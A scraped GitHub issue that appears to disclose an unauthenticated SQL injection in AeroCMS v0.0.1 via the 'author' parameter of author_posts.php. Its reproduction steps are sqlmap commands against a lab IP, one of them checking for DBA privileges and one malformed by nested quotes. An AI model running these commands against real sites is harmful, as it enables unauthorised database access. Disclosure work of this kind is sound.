You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on May 8, 2023. It is now read-only.
AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers does not require authentication to obtain database administrator privileges and access database information. etc.
Reproduct
No login required. execute sqlmap command: python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author",we can see SQL injection vulnerability exists in the "author"parameter
execute sqlmap command: python sqlmap.py -u "python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba,we can see "DBA: TRUE"
Vulnerable Code
The “author” parameter is not escaped before executing the sql query statement
The text was updated successfully, but these errors were encountered:
Sign up for freeto subscribe to this conversation on GitHub.
Already have an account?
Sign in.
AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the "author" parameter at \author_posts.php. This vulnerability allows attackers does not require authentication to obtain database administrator privileges and access database information. etc.
No login required. execute sqlmap command:
python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author"
,we can see SQL injection vulnerability exists in the "author"parameterexecute sqlmap command:
python sqlmap.py -u "python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba
,we can see "DBA: TRUE"The “author” parameter is not escaped before executing the sql query statement
The text was updated successfully, but these errors were encountered: